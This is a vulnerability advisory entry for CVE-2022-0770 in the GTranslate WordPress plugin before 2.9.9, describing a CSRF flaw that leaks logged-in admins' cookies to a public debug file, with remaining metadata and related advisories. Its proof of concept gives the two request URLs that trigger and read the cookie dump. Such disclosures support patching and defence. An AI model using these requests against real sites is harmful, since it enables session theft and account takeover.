Translate WordPress with GTranslate < 2.9.9 – CSRF to Account Takeover | CVE 2022-0770 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some files, and write debug data such as user's cookies in a publicly accessible file if a specific parameter is used when requesting them. Combining those two issues, an attacker could gain access to a logged in admin cookies by making them open a malicious link or page

Proof of Concept

Make a logged in admin (or any other account you want to gain access to) open

https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=es&gurl=PoC&enable_debug

Then access https://example.com/wp-content/plugins/gtranslate/url_addon/debug.txt to get the users cookies

Affects Plugins

Fixed in 2.9.9

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Diogo Real

Verified

Yes

WPVDB ID

49abe79c-ab1c-4dbf-824c-8daaac7e079d

Timeline

Publicly Published

2022-03-07 (about 3 years ago)

Added

2022-03-07 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-08-09

Title

Christmasify! < 1.5.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-06-30

Title

MZ MBO Access < 2.0.9 - Unauthorised AJAX call

Published

2023-01-27

Title

Ecwid Shopping Cart < 6.11.4 - Import via CSRF

Published

2024-02-27

Title

Envo's Elementor Templates & Widgets for WooCommerce < 1.4.5 - Arbitrary Theme Activation via CSRF

Published

2014-08-01

Title

HMS Testimonials 2.0.10 - CSRF